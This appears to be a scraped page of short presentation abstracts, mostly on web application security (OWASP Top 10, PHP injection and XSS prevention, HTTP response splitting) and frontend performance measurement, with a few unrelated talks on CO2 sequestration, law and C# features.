The document discusses input validation and output encoding to prevent vulnerabilities like XSS and SQL injection. It provides examples of how unexpected input can enable attacks, like special characters or invalid data types being passed to endpoints and rendered unencoded. The key lessons are that input validation is needed to receive clean, expected data, while output encoding is crucial to prevent exploits when displaying data to users. Both techniques are important defenses that address different but related issues.
The goal of this talk is to educate developers on common security vulnerabilities, how they are exploited, and how to protect against them. We'll explore several of the OWASP Top 10 attack vectors like SQL injection, XSS, CSRF, session hijacking, and insecure direct object references. Each topic will be approached from the perspective of an attacker to see how these vulnerabilities are detected and exploited using several realistic examples. Once we've established an understanding of how these attacks work, we'll look at concrete steps you can take to secure web applications against such vulnerabilities. The knowledge gained from this talk can also be used for participating in "Capture the Flag" security competitions.
The document discusses various PHP security vulnerabilities like code injection, SQL injection, cross-site scripting (XSS), session hijacking, and remote code execution. It provides examples of each vulnerability and methods to prevent them, such as input validation, output encoding, secure session management, and restricting shell commands. The goal is to teach secure PHP programming practices to avoid security issues and defend against common attacks.
A lunch lecture was given at Differ (www.differ.nl) about another method of sequestering CO2. Olivine is one of the minerals that can be used for the application. It details three routes for CO2 sequestration. A focus is given on the development of a process intensification. This would increase the geological reaction rate to process engineering time scale.
The proposed process has got a parallel in the "VerTech process" as established in the 1990's in Apeldoorn (the Netherlands).
The lecture was from global scale (focussing on amounts of CO2 involved) down to atomic scale.
Hacking Your Way to Better Security - PHP South Africa 2016
This talk educates developers on common security vulnerabilities, how they are exploited, and how to protect against them. We'll explore several of the OWASP Top 10 attack vectors like SQL injection, XSS, CSRF, and more. Each topic will be approached from the perspective of an attacker to see how these vulnerabilities are detected and exploited using several realistic examples. We'll then apply this knowledge to see how web applications can be secured against such vulnerabilities.
The document discusses techniques for validating SSL certificates to prevent man-in-the-middle attacks. It describes reference certificates, where the client bundles the server's certificate and compares it to the one presented. It also covers certificate fingerprinting, where the client compares the certificate's fingerprint to a trusted reference. Both approaches aim to detect if a rogue certificate is intercepting the connection between client and server. The document cautions that certificate changes over time could break validation and recommends updating apps and references in a timely manner.
The document discusses various topics related to Ruby on Rails including SQLite3-Ruby, ERb, and Rack. It provides an overview of how SQLite3-Ruby works with Rails as the default database adapter. It also discusses how to use SQLite3-Ruby outside of Rails, including establishing connections, making queries, and preparing statements. The document then summarizes how ERb works as the template language in Rails and how to use it outside Rails. It ends with a brief mention of Rack.
This document describes a user authentication module created using PHP. It includes pages for sign up, login, password reset, and a user inbox. The sign up page collects user details and validates the information before inserting a new user record into a MySQL database. The login page authenticates users by matching their user ID and password. Password and security answers are encrypted before storage. The module provides functionality for common authentication tasks.
The document discusses principles of clean code, including:
- Functions should be small and focus on doing one thing.
- Use intention-revealing names for variables, functions, etc.
- Avoid comments when possible by making code self-documenting.
- Prefer exceptions over returning error codes to indicate problems.
Mugdha and Amish from OSSCube present on Php security at OSSCamp, organized by OSSCube - A Global open Source enterprise for Open Source Solutions
To know how we can help your business grow, leveraging Open Source, contact us:
India: +91 995 809 0987
USA: +1 919 791 5427
WEB: www.osscube.com
Mail: sales@osscube.com
Why are most code bases bad? Why is it, that, despite our best intentions, code rots between our fingers? The answer is that most of us still think of code as merely a technical tool to reach a goal: implementing a feature, fixing a bug. While it certainly is that, it’s also a written medium for communicating with (other) people.
This document provides an overview of the ACC Europe's 2005 Annual Conference, including summaries of presentations on common differences between civil and common law jurisdictions and comparisons between common law systems.
The conference featured presentations from legal experts on topics such as distinguishing features of various European legal systems and procedural rules. One presentation provided a high-level summary of 501 differences between civil and common law jurisdictions.
Another presentation compared common law systems, noting differences in sources of law, roles of judges, and approaches to precedent between countries like England, Ireland, and local systems. The conference offered opportunities for lawyers to learn and discuss diverse international legal practices.
PHP has its own treasure chest of classic mistakes that surprises even the most seasoned expert : code that dies just by changing its namespace, strpos() that fails to find strings or arrays that changes without touching them.
Do that get on your nerves too ? Let’s make a list of them, so we can always teach them to the new guys, spot them during code reviews and kick them out of our code once and for all. Come on, you’re not frightening us !
The document contains code snippets for making API calls to PayPal to facilitate different parts of an Express Checkout transaction flow. The code handles setting up an Express Checkout transaction, getting details of an Express Checkout transaction, and completing payment for an Express Checkout transaction. It also includes code for setting up a billing agreement and reference transactions.
The document discusses a new service being launched by Moie Serv to provide document summarization in 3 sentences or less. The service aims to extract the key details and essential information from documents in a concise manner. It can summarize documents from legal, medical, academic and news domains. Customers will be able to access the summarization tool through Moie Serv's website.
Dip Your Toes in the Sea of Security (PHP South Africa 2017)
Security is an enormous topic, and it’s really, really complicated. If you’re not careful, you’ll find yourself vulnerable to any number of attacks which you definitely don’t want to be on the receiving end of. This talk will give you just a taster of the vast array of things there is to know about security in modern web applications, such as writing secure PHP web applications and securing a Linux server. Whether you are writing anything beyond a basic brochure website, or even developing a complicated business web application, this talk will give you insights to some of the things you need to be aware of.
BioPerl is an open source toolkit for bioinformatics data manipulation written in Perl. It contains modules for reading and writing sequence data in common formats, manipulating sequences, parsing BLAST reports and multiple sequence alignments. BioPerl objects represent sequences, features, annotations and search results in a flexible and extensible way. The toolkit is widely used for tasks like sequence analysis, parsing bioinformatics software output, and accessing biological databases.
This document discusses Boomerang, a JavaScript tool that measures web page performance from the end user's perspective. It works by including a small snippet of JavaScript on web pages that measures load time, latency, and bandwidth and sends the results back to the server. It provides more accurate real-world performance metrics than lab testing alone. The document explains how Boomerang specifically measures latency by downloading small images repeatedly, bandwidth by progressively larger images, and load time using timestamps. Contributing code or plugins to the Boomerang open source project on GitHub can help improve it.
This document is a presentation about javascript charting with YUI-Flot. It introduces YUI-Flot as a port of the Flot charting library to the YUI framework. It discusses charting options for the web, demonstrates basic chart types with YUI-Flot like scatter plots and time series, and covers how to include the library, get data, and instantiate charts. It also outlines future plans like supporting newer Flot features and contributions from the community.
The document discusses boomerang, a JavaScript tool for measuring web page performance from the end user's perspective. It works by measuring latency, bandwidth, and page load times and sending that data back to the developer. The collected data can be analyzed to identify outliers, trends over time, and opportunities for performance improvements based on factors like user location and ISP.
A survey found that 35% of viewers blame the operator when video streaming is not working properly, while 70% of subscribers consider TV Everywhere an important offering provided by their provider. The survey also found that gaining 50,000 additional subscribers can generate $50 million in annual revenue for providers.
The document discusses improving website performance. It notes that performance depends on bandwidth and latency. Bandwidth refers to the maximum data transfer rate, while latency refers to delays in data transfer. The document suggests concentrating optimization efforts on improving either bandwidth or latency based on individual website needs. Faster load times can positively impact user experience and business metrics like conversion rates.
Improving D3 Performance with CANVAS and other Hacks
This document discusses techniques for improving the performance of D3 visualizations. It begins with an overview of D3 and some basic tutorials. It then describes issues with performance for force-directed layouts and edge-bundled layouts as the number of nodes and links increases. Solutions proposed include using canvas instead of SVG for rendering, reducing unnecessary calculations, and caching repeated drawing states. The document concludes that the number of DOM nodes has major performance implications and techniques like canvas can help when exact mouse interactions are not required.
This document summarizes common web application vulnerabilities like SQL injection and cross-site scripting (XSS) for PHP applications. It provides examples of each vulnerability and discusses mitigation strategies like input sanitization, encoding output, and using security frameworks. It also covers other risks like cross-site request forgery (CSRF) and the importance of secure server configurations.
Some basic security controls you can (and should) implement in your web apps. Specifically this covers:
1 - Beyond SQL injection
2 - Cross-site Scripting
3 - Access Control
These are the slides from a talk "Spot the Web Vulnerability" held at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) by Miroslav Stampar.
This document contains sample questions for the Zend Certification PHP 5 exam. It includes multiple choice questions testing PHP 5 language features and best practices related to topics like XML processing, database access, regular expressions, and security. The questions cover syntax, functions, patterns and other PHP concepts that could appear on the certification exam.
This document provides an overview and examples of using PHP for various purposes including as a templating system, scripting language, and for generating dynamic images and PDFs. It discusses PHP's widespread use based on statistics and provides code examples for creating graphs, charts and invoices using PHP's gdchart and PDF extensions.
Presented at #PHPLX 11 September 2013
The 2013 edition of OWASP (Open Web Application Security Project) top 10 has just been released and unfortunately Injections (not only SQL injection) is still the most common security problem. In this talk we will review the top 10 list of security problems looking at possible attack scenarios and ways to protect against them mostly from a PHP programmer perspective.
This document discusses strategies for dealing with legacy PHP code, including separating controllers and views, removing dependencies on global variables, refactoring procedural code to be object-oriented, and untangling nested require statements. Specific problems in legacy PHP code are said to include mixing of PHP and HTML, overuse of requires instead of method calls, and excessive use of global variables. The document provides examples of refactoring code to address these issues.
The document discusses new features introduced in C# 7 and C# 7.1-7.2, including tuples, pattern matching, out variables, discards, numeric literals, local functions, generalized async return types, inferred tuple element names, default literals, async Main method, non-trailing named arguments, and leading separators for numeric literals. It provides links to Microsoft documentation and proposals for each new feature.
The document summarizes best practices for WordPress development. It recommends leveraging WordPress core functionality through APIs and hooks, contributing to core, internationalizing code, and following coding standards to write clean, readable code. It also emphasizes allowing others to hook into code through actions and filters and the importance of sanitization, escaping and security.
Ruby on Rails is a web application framework that is designed to make programming web applications easier. It uses conventions over configurations and includes features like ActiveRecord for object-relational mapping, ActionPack for building web applications, and ActionView for rendering views. Rails emphasizes convention over configuration and aims to provide a full stack framework that makes it easy to build database-backed web applications by following its conventions.
This document outlines three "creeds" or principles for front-end engineers according to Morgan Cheng. Creed I states that performance is a key feature and outlines best practices like minimizing HTTP requests and assets. Creed II discusses progressive enhancement and building web pages that degrade gracefully across browsers. Creed III states the importance of being paranoid about security vulnerabilities like SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF) by never trusting user input.
This document discusses error management in ZIO compared to Future. It begins with an overview of ZIO and Future effects before comparing how each handles errors. Key differences noted are that Future throws errors away on a side channel while ZIO composes errors. The document recommends best practices for error handling in ZIO like extending exceptions in sealed traits and avoiding reflexive logging. It concludes by discussing how ZIO enables next-generation debugging by tracking fibers and continuations during asynchronous execution.
Dan Kaminsky introduces his new company Recursion Ventures and discusses session management on the web. He explains that the web was not designed for authenticated resources and credentials are easily accessible across sites due to issues with cookie-based session management. Kaminsky proposes using smarter string interpolation to allow developers to write code inline while preventing injections. He demonstrates a prototype called Interpolique that uses base64 encoding to sanitize variables before insertion into queries. This approach aims to make secure coding easier and mistakes immediately apparent.
Every software developer enjoys finding new and clever ways to solve problems. Writing code using his/her wits, intelligent and creativity. However, sometimes being too clever can lead to hard to track bugs, maintainability issues and impossible to understand code. Is all cleverly written code good code, or is it a problem just waiting to happen? In this session, I will show you real world examples of cleverly written code. And show you how we can use clean code principles, refactoring and design patterns, to transform that code from clever code to good code – one that your peers and future self would thank you for writing.
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come back
This document discusses various techniques for HTTP response splitting and cache poisoning attacks. It provides examples of exploiting HTTP response splitting vulnerabilities to inject additional headers and responses. It also covers ways to poison caches by manipulating headers like Content-Length and Last-Modified to influence caching behavior. The document examines defenses implemented in modern browsers and web servers as well as mitigation techniques. It raises questions about the potential for these attacks to impact other protocols beyond HTTP.
The document discusses refactoring legacy PHP code, specifically dealing with code that has no separation between PHP and HTML. It recommends separating code into controllers and views by gathering all code, separating controller and view code, assigning variables to a view object, changing variable references in the view code, and splitting the files. Specific problems in legacy PHP code like no separation of concerns, global variables, and reliance on includes can be addressed through techniques like creating view classes, encapsulating logic in objects, and wrapping includes in functions to untangle dependency webs. The goal is to safely change code implementation without changing behavior through refactoring.
This document introduces Interpolique, a new approach to string interpolation that aims to prevent SQL injection and other injection attacks. It demonstrates how Interpolique works by rewriting inline SQL queries to use parameterized queries behind the scenes. Interpolique uses base64 encoding to safely pass variable data into queries. It allows developers to write queries inline while still protecting against injection. The goal is to let developers write code as they normally would but make injection attacks much harder to perform.
A talk about the current state of java enterprise development, evaluation of the available alternatives to conventional enterprise solutions, tools and languages for the JVM, and possibly beyond.
JUG-Roma meeting 16 Sept 2014
The document summarizes the OWASP Top 10 security risks and provides prevention techniques. It discusses injection, cross-site scripting (XSS), insecure deserialization, XML external entities (XXE), and other risks. For each risk, it recommends validating, sanitizing, and escaping user input, using prepared statements, and other best practices to prevent security vulnerabilities.
Frontend Performance: Beginner to Expert to Crazy Person
There’s no such thing as fast enough. You can always make your website faster. This talk will show you how. The very first requirement of a great user experience is actually getting the bytes of that experience to the user before they they get tired and leave.In this talk we’ll start with the basics and get progressively insane. We’ll go over several frontend performance best practices, a few anti-patterns, the reasoning behind the rules, and how they’ve changed over the years. We’ll also look at some great tools to help you.
The CheckAccessCard function verifies the presence of a card and checks if it is accessible. It checks the communication port, reader type, card serial number, key file and PIN. It returns 1 if the card is accessible or 0 if not accessible.
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with MovidiusKnowledge & Experience
The document discusses using an OpenVino extension module on a Raspberry Pi with a MOVIDIUS to run object detection, face recognition, and other AI models in a low-cost way. It provides details on the logic flow of the face recognition module, supported AI models, and how to develop an IoT Edge module to integrate the OpenVino functionality with Azure Video Analyzer on Edge. Developing the module requires addressing differences in CPU architectures between the Raspberry Pi, MOVIDIUS, and Azure Video Analyzer on Edge.
This document provides an overview of new features in PHP 6 and the intl extension that improve support for internationalization and localization. Some key points include:
- PHP 6 includes full Unicode support throughout the engine, extensions, and API using the ICU library.
- The intl extension includes classes for collating and sorting strings, formatting numbers and currencies based on locales, and transliterating between scripts.
- New text iterator and text transform classes allow powerful linear and chained processing of Unicode text.
- Streams support automatic encoding conversions for reading/writing files in different encodings.
- Functions like strtoupper() now perform proper locale-aware case mappings.
The goal of this talk is to educate developers on common security vulnerabilities, how they are exploited, and how to protect against them. We'll explore several of the OWASP Top 10 attack vectors like SQL injection, XSS, CSRF, session hijacking, and insecure direct object references. Each topic will be approached from the perspective of an attacker to see how these vulnerabilities are detected and exploited using several realistic examples. Once we've established an understanding of how these attacks work, we'll look at concrete steps you can take to secure web applications against such vulnerabilities. The knowledge gained from this talk can also be used for participating in "Capture the Flag" security competitions.
The document discusses various PHP security vulnerabilities like code injection, SQL injection, cross-site scripting (XSS), session hijacking, and remote code execution. It provides examples of each vulnerability and methods to prevent them, such as input validation, output encoding, secure session management, and restricting shell commands. The goal is to teach secure PHP programming practices to avoid security issues and defend against common attacks.
A lunch lecture was given at Differ (www.differ.nl) about another method of sequestering CO2. Olivine is one of the minerals that can be used for the application. It details three routes for CO2 sequestration. A focus is given on the development of a process intensification. This would increase the geological reaction rate to process engineering time scale.
The proposed process has got a parallel in the "VerTech process" as established in the 1990's in Apeldoorn (the Netherlands).
The lecture was from global scale (focussing on amounts of CO2 involved) down to atomic scale.
Hacking Your Way to Better Security - PHP South Africa 2016Colin O'Dell
This talk educates developers on common security vulnerabilities, how they are exploited, and how to protect against them. We'll explore several of the OWASP Top 10 attack vectors like SQL injection, XSS, CSRF, and more. Each topic will be approached from the perspective of an attacker to see how these vulnerabilities are detected and exploited using several realistic examples. We'll then apply this knowledge to see how web applications can be secured against such vulnerabilities.
The document discusses techniques for validating SSL certificates to prevent man-in-the-middle attacks. It describes reference certificates, where the client bundles the server's certificate and compares it to the one presented. It also covers certificate fingerprinting, where the client compares the certificate's fingerprint to a trusted reference. Both approaches aim to detect if a rogue certificate is intercepting the connection between client and server. The document cautions that certificate changes over time could break validation and recommends updating apps and references in a timely manner.
The document discusses various topics related to Ruby on Rails including SQLite3-Ruby, ERb, and Rack. It provides an overview of how SQLite3-Ruby works with Rails as the default database adapter. It also discusses how to use SQLite3-Ruby outside of Rails, including establishing connections, making queries, and preparing statements. The document then summarizes how ERb works as the template language in Rails and how to use it outside Rails. It ends with a brief mention of Rack.
This document describes a user authentication module created using PHP. It includes pages for sign up, login, password reset, and a user inbox. The sign up page collects user details and validates the information before inserting a new user record into a MySQL database. The login page authenticates users by matching their user ID and password. Password and security answers are encrypted before storage. The module provides functionality for common authentication tasks.
The document discusses principles of clean code, including:
- Functions should be small and focus on doing one thing.
- Use intention-revealing names for variables, functions, etc.
- Avoid comments when possible by making code self-documenting.
- Prefer exceptions over returning error codes to indicate problems.
Mugdha and Amish from OSSCube present on Php security at OSSCamp, organized by OSSCube - A Global open Source enterprise for Open Source Solutions
To know how we can help your business grow, leveraging Open Source, contact us:
India: +91 995 809 0987
USA: +1 919 791 5427
WEB: www.osscube.com
Mail: sales@osscube.com
Why are most code bases bad? Why is it, that, despite our best intentions, code rots between our fingers? The answer is that most of us still think of code as merely a technical tool to reach a goal: implementing a feature, fixing a bug. While it certainly is that, it’s also a written medium for communicating with (other) people.
This document provides an overview of the ACC Europe's 2005 Annual Conference, including summaries of presentations on common differences between civil and common law jurisdictions and comparisons between common law systems.
The conference featured presentations from legal experts on topics such as distinguishing features of various European legal systems and procedural rules. One presentation provided a high-level summary of 501 differences between civil and common law jurisdictions.
Another presentation compared common law systems, noting differences in sources of law, roles of judges, and approaches to precedent between countries like England, Ireland, and local systems. The conference offered opportunities for lawyers to learn and discuss diverse international legal practices.
PHP has its own treasure chest of classic mistakes that surprises even the most seasoned expert : code that dies just by changing its namespace, strpos() that fails to find strings or arrays that changes without touching them.
Do that get on your nerves too ? Let’s make a list of them, so we can always teach them to the new guys, spot them during code reviews and kick them out of our code once and for all. Come on, you’re not frightening us !
The document contains code snippets for making API calls to PayPal to facilitate different parts of an Express Checkout transaction flow. The code handles setting up an Express Checkout transaction, getting details of an Express Checkout transaction, and completing payment for an Express Checkout transaction. It also includes code for setting up a billing agreement and reference transactions.
The document discusses a new service being launched by Moie Serv to provide document summarization in 3 sentences or less. The service aims to extract the key details and essential information from documents in a concise manner. It can summarize documents from legal, medical, academic and news domains. Customers will be able to access the summarization tool through Moie Serv's website.
Dip Your Toes in the Sea of Security (PHP South Africa 2017)James Titcumb
Security is an enormous topic, and it’s really, really complicated. If you’re not careful, you’ll find yourself vulnerable to any number of attacks which you definitely don’t want to be on the receiving end of. This talk will give you just a taster of the vast array of things there is to know about security in modern web applications, such as writing secure PHP web applications and securing a Linux server. Whether you are writing anything beyond a basic brochure website, or even developing a complicated business web application, this talk will give you insights to some of the things you need to be aware of.
Comparative Genomics with GMOD and BioPerlJason Stajich
BioPerl is an open source toolkit for bioinformatics data manipulation written in Perl. It contains modules for reading and writing sequence data in common formats, manipulating sequences, parsing BLAST reports and multiple sequence alignments. BioPerl objects represent sequences, features, annotations and search results in a flexible and extensible way. The toolkit is widely used for tasks like sequence analysis, parsing bioinformatics software output, and accessing biological databases.
This document discusses Boomerang, a JavaScript tool that measures web page performance from the end user's perspective. It works by including a small snippet of JavaScript on web pages that measures load time, latency, and bandwidth and sends the results back to the server. It provides more accurate real-world performance metrics than lab testing alone. The document explains how Boomerang specifically measures latency by downloading small images repeatedly, bandwidth by progressively larger images, and load time using timestamps. Contributing code or plugins to the Boomerang open source project on GitHub can help improve it.
This document is a presentation about javascript charting with YUI-Flot. It introduces YUI-Flot as a port of the Flot charting library to the YUI framework. It discusses charting options for the web, demonstrates basic chart types with YUI-Flot like scatter plots and time series, and covers how to include the library, get data, and instantiate charts. It also outlines future plans like supporting newer Flot features and contributions from the community.
Boomerang at the Boston Web Performance meetupPhilip Tellis
The document discusses boomerang, a JavaScript tool for measuring web page performance from the end user's perspective. It works by measuring latency, bandwidth, and page load times and sending that data back to the developer. The collected data can be analyzed to identify outliers, trends over time, and opportunities for performance improvements based on factors like user location and ISP.
A survey found that 35% of viewers blame the operator when video streaming is not working properly, while 70% of subscribers consider TV Everywhere an important offering provided by their provider. The survey also found that gaining 50,000 additional subscribers can generate $50 million in annual revenue for providers.
The document discusses improving website performance. It notes that performance depends on bandwidth and latency. Bandwidth refers to the maximum data transfer rate, while latency refers to delays in data transfer. The document suggests concentrating optimization efforts on improving either bandwidth or latency based on individual website needs. Faster load times can positively impact user experience and business metrics like conversion rates.
Improving D3 Performance with CANVAS and other HacksPhilip Tellis
This document discusses techniques for improving the performance of D3 visualizations. It begins with an overview of D3 and some basic tutorials. It then describes issues with performance for force-directed layouts and edge-bundled layouts as the number of nodes and links increases. Solutions proposed include using canvas instead of SVG for rendering, reducing unnecessary calculations, and caching repeated drawing states. The document concludes that the number of DOM nodes has major performance implications and techniques like canvas can help when exact mouse interactions are not required.
This document summarizes common web application vulnerabilities like SQL injection and cross-site scripting (XSS) for PHP applications. It provides examples of each vulnerability and discusses mitigation strategies like input sanitization, encoding output, and using security frameworks. It also covers other risks like cross-site request forgery (CSRF) and the importance of secure server configurations.
Some basic security controls you can (and should) implement in your web apps. Specifically this covers:
1 - Beyond SQL injection
2 - Cross-site Scripting
3 - Access Control
These are the slides from a talk "Spot the Web Vulnerability" held at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) by Miroslav Stampar.
This document contains sample questions for the Zend Certification PHP 5 exam. It includes multiple choice questions testing PHP 5 language features and best practices related to topics like XML processing, database access, regular expressions, and security. The questions cover syntax, functions, patterns and other PHP concepts that could appear on the certification exam.
This document provides an overview and examples of using PHP for various purposes including as a templating system, scripting language, and for generating dynamic images and PDFs. It discusses PHP's widespread use based on statistics and provides code examples for creating graphs, charts and invoices using PHP's gdchart and PDF extensions.
Presented at #PHPLX 11 September 2013
The 2013 edition of OWASP (Open Web Application Security Project) top 10 has just been released and unfortunately Injections (not only SQL injection) is still the most common security problem. In this talk we will review the top 10 list of security problems looking at possible attack scenarios and ways to protect against them mostly from a PHP programmer perspective.
This document discusses strategies for dealing with legacy PHP code, including separating controllers and views, removing dependencies on global variables, refactoring procedural code to be object-oriented, and untangling nested require statements. Specific problems in legacy PHP code are said to include mixing of PHP and HTML, overuse of requires instead of method calls, and excessive use of global variables. The document provides examples of refactoring code to address these issues.
The document discusses new features introduced in C# 7 and C# 7.1-7.2, including tuples, pattern matching, out variables, discards, numeric literals, local functions, generalized async return types, inferred tuple element names, default literals, async Main method, non-trailing named arguments, and leading separators for numeric literals. It provides links to Microsoft documentation and proposals for each new feature.
The document summarizes best practices for WordPress development. It recommends leveraging WordPress core functionality through APIs and hooks, contributing to core, internationalizing code, and following coding standards to write clean, readable code. It also emphasizes allowing others to hook into code through actions and filters and the importance of sanitization, escaping and security.
Ruby on Rails is a web application framework that is designed to make programming web applications easier. It uses conventions over configurations and includes features like ActiveRecord for object-relational mapping, ActionPack for building web applications, and ActionView for rendering views. Rails emphasizes convention over configuration and aims to provide a full stack framework that makes it easy to build database-backed web applications by following its conventions.
This document outlines three "creeds" or principles for front-end engineers according to Morgan Cheng. Creed I states that performance is a key feature and outlines best practices like minimizing HTTP requests and assets. Creed II discusses progressive enhancement and building web pages that degrade gracefully across browsers. Creed III states the importance of being paranoid about security vulnerabilities like SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF) by never trusting user input.
This document discusses error management in ZIO compared to Future. It begins with an overview of ZIO and Future effects before comparing how each handles errors. Key differences noted are that Future throws errors away on a side channel while ZIO composes errors. The document recommends best practices for error handling in ZIO like extending exceptions in sealed traits and avoiding reflexive logging. It concludes by discussing how ZIO enables next-generation debugging by tracking fibers and continuations during asynchronous execution.
Dan Kaminsky introduces his new company Recursion Ventures and discusses session management on the web. He explains that the web was not designed for authenticated resources and credentials are easily accessible across sites due to issues with cookie-based session management. Kaminsky proposes using smarter string interpolation to allow developers to write code inline while preventing injections. He demonstrates a prototype called Interpolique that uses base64 encoding to sanitize variables before insertion into queries. This approach aims to make secure coding easier and mistakes immediately apparent.
Every software developer enjoys finding new and clever ways to solve problems. Writing code using his/her wits, intelligent and creativity. However, sometimes being too clever can lead to hard to track bugs, maintainability issues and impossible to understand code. Is all cleverly written code good code, or is it a problem just waiting to happen? In this session, I will show you real world examples of cleverly written code. And show you how we can use clean code principles, refactoring and design patterns, to transform that code from clever code to good code – one that your peers and future self would thank you for writing.
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come backDefconRussia
This document discusses various techniques for HTTP response splitting and cache poisoning attacks. It provides examples of exploiting HTTP response splitting vulnerabilities to inject additional headers and responses. It also covers ways to poison caches by manipulating headers like Content-Length and Last-Modified to influence caching behavior. The document examines defenses implemented in modern browsers and web servers as well as mitigation techniques. It raises questions about the potential for these attacks to impact other protocols beyond HTTP.
The document discusses refactoring legacy PHP code, specifically dealing with code that has no separation between PHP and HTML. It recommends separating code into controllers and views by gathering all code, separating controller and view code, assigning variables to a view object, changing variable references in the view code, and splitting the files. Specific problems in legacy PHP code like no separation of concerns, global variables, and reliance on includes can be addressed through techniques like creating view classes, encapsulating logic in objects, and wrapping includes in functions to untangle dependency webs. The goal is to safely change code implementation without changing behavior through refactoring.
This document introduces Interpolique, a new approach to string interpolation that aims to prevent SQL injection and other injection attacks. It demonstrates how Interpolique works by rewriting inline SQL queries to use parameterized queries behind the scenes. Interpolique uses base64 encoding to safely pass variable data into queries. It allows developers to write queries inline while still protecting against injection. The goal is to let developers write code as they normally would but make injection attacks much harder to perform.
A talk about the current state of java enterprise development, evaluation of the available alternatives to conventional enterprise solutions, tools and languages for the JVM, and possibly beyond.
JUG-Roma meeting 16 Sept 2014
The document summarizes the OWASP Top 10 security risks and provides prevention techniques. It discusses injection, cross-site scripting (XSS), insecure deserialization, XML external entities (XXE), and other risks. For each risk, it recommends validating, sanitizing, and escaping user input, using prepared statements, and other best practices to prevent security vulnerabilities.
Frontend Performance: Beginner to Expert to Crazy PersonPhilip Tellis
There’s no such thing as fast enough. You can always make your website faster. This talk will show you how. The very first requirement of a great user experience is actually getting the bytes of that experience to the user before they they get tired and leave.In this talk we’ll start with the basics and get progressively insane. We’ll go over several frontend performance best practices, a few anti-patterns, the reasoning behind the rules, and how they’ve changed over the years. We’ll also look at some great tools to help you.
Frontend Performance: De débutant à Expert à Fou FurieuxPhilip Tellis
Frontend Performance Beginner to Expert to Crazy Person
The very first requirement of a great user experience is actually getting the bytes of that experience to the user before they they get tired and leave.
In this talk we'll start with the basics and get progressively insane. We'll go over several frontend performance best practices, a few anti-patterns, the reasoning behind the rules, and how they've changed over the years. We'll also look at some great tools to help you.
La performance front-end de débutant, à expert, à fou furieux !
La toute première condition nécessaire à une bonne expérience utilisateur est de pouvoir obtenir les octets de cette expérience avant que l'utilisateur ne se lasse et parte.
Nous débuterons cette conférence avec les bases pour progressivement devenir démentiel. Nous aborderons plusieurs des meilleurs pratiques de la performance front-end, quelques anti-patterns à éviter, le raisonnement derrière les règles, et comment ces dernières ont changé au fil des ans. Nous regarderons d'un peu plus près quelques très bon outils qui peuvent vous aider.
Frontend Performance: Expert to Crazy PersonPhilip Tellis
The document outlines steps for front-end performance optimization, beginning with basic techniques like caching, compression and domain sharing and progressing to more advanced strategies involving preloading, parallel downloads, and predicting response times. It was presented by Philip Tellis at WebPerfDays New York and includes references for further reading on topics like CDNs, TCP tuning, and the page visibility API.
RUM isn’t just for page level metrics anymore. Thanks to modern browser updates and new techniques we can collect real user data at the object level, finding slow page components and keeping third parties honest.
In this talk we will show you how to use Resource Timing, User Timing, and other browser tricks to time the most important components in your page. We’ll also share recipes for several of the web’s most popular third parties. This will give you a head start on measuring object level performance on your own site.
Frontend Performance: Beginner to Expert to Crazy Person (San Diego Web Perf ...Philip Tellis
The document outlines steps web performance experts take to optimize frontend performance, moving from beginner to advanced techniques. It starts with basic optimizations like enabling gzip, caching, and image optimization. It then discusses more advanced strategies like using a CDN, splitting JavaScript, auditing CSS, and parallelizing downloads. Finally it discusses very advanced techniques like pre-loading assets, detecting broken Accept-Encoding headers, and understanding how to optimize for HTTP/2. The document provides references for further information on each topic.
Frontend Performance: Beginner to Expert to Crazy PersonPhilip Tellis
The document discusses front-end web performance optimization from beginner to expert levels. At the beginner level, it recommends starting with basic optimizations like measuring performance, enabling gzip compression, optimizing images, and caching. At the expert level, it discusses more advanced techniques like using a CDN, splitting JavaScript files, auditing CSS, and flushing content early. Finally, it outlines "crazy" optimizations like pre-loading assets, post-load fetching, and understanding round-trip network latency.
Frontend Performance: Beginner to Expert to Crazy PersonPhilip Tellis
Boston Web Performance Meetup, April 22, 2014
The very first requirement of a great user experience is actually getting the bytes of that experience to the user before they they get fed up and leave. In this talk we'll start with the basics and get progressively insane. We'll go over several front-end performance best practices, a few anti-patterns, the reasoning behind the rules, and how they've changed over the years. We'll also look at some great tools to help you.
Schedule: 6:30, pizza
7:15: talk
Frontend Performance: Beginner to Expert to Crazy PersonPhilip Tellis
The very first requirement of a great user experience is actually getting the bytes of that experience to the user before they they get fed up and leave.
In this talk we'll start with the basics and get progressively insane. We'll go over several frontend performance best practices, a few anti-patterns, the reasoning behind the rules, and how they've changed over the years. We'll also look at some great tools to help you.
The document appears to be a presentation on measuring real user experiences using Real User Monitoring (RUM) and analyzing the data. It discusses using RUM tools like Boomerang to collect data on user behavior and performance in real-time. The presentation then examines specific metrics collected like user patience, cache behavior, and how quickly new software versions are distributed based on the RUM data.
Improving 3rd Party Script Performance With IFramesPhilip Tellis
This document discusses using <IFRAME> tags to improve the performance of third party scripts. It describes how third party scripts normally block page loading and proposes using an iframe to load scripts asynchronously in parallel without blocking. It provides code for creating an iframe targeted to load scripts, handling cross-domain issues, and modifying the Method Queue Pattern to support iframes. The approach allows third party scripts to load without blocking the main page load.
The document discusses Boomerang, an open source tool for measuring real user performance on websites. It measures load times, bandwidth usage, latency and other metrics. Additional functionality can be added through plugins. The presentation encourages developers to use Boomerang to analyze user behavior, identify performance issues, and continuously improve sites based on real user data. It provides several examples of insights that can be gained, such as how performance varies by country, browser, and internet connection speed.
Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"Philip Tellis
The document is a presentation about abusing JavaScript to measure web performance. It discusses using JavaScript to measure network latency, TCP handshake time, network throughput, DNS lookup time, IPv6 support and latency, and other performance metrics. It provides code examples for measuring each metric in JavaScript and notes challenges to consider. The presentation encourages the use of the open source Boomerang library for accurate performance measurement.
The Statistics of Web Performance AnalysisPhilip Tellis
If you're interested in measuring real user web performance, you'll find tools like boomerang or episodes quite handy. Some popular web frameworks even have modules that make it easy to add them to your site. However, what does one do once one has collected the data? How do you filter out the noise and get meaningful insights from the data?
